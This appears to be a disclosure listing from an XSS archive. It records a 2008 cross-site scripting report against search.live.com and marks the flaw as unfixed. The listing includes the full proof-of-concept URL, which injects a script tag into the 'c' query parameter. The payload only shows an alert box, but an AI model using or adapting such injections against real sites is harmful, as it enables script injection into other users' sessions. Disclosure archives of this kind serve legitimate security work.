Security researcher pRaLe, has submitted on 06/11/2008 a cross-site-scripting (XSS) vulnerability affecting search.live.com, which at the time of submission ranked 5 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 06/11/2008 |
Date published: 05/07/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: pRaLe |
Domain: search.live.com |
Category: XSS |
Pagerank: 5 |
|---|
URL: http://search.live.com/cashback/products/search?q=monitors&c="/><script>alert("Hello");</script>&fil
ter[0]=1&f[0][vmin]=1&f[0][vmax]=45013&f[0][smin]=1&f[0][smax]=100&filter[0]=1&filter[1]=1&filter[2]
=1&s=&d=&price_filter=1&form=MSNHM4 |
|
Click here to view the mirror
|
|
|
| 
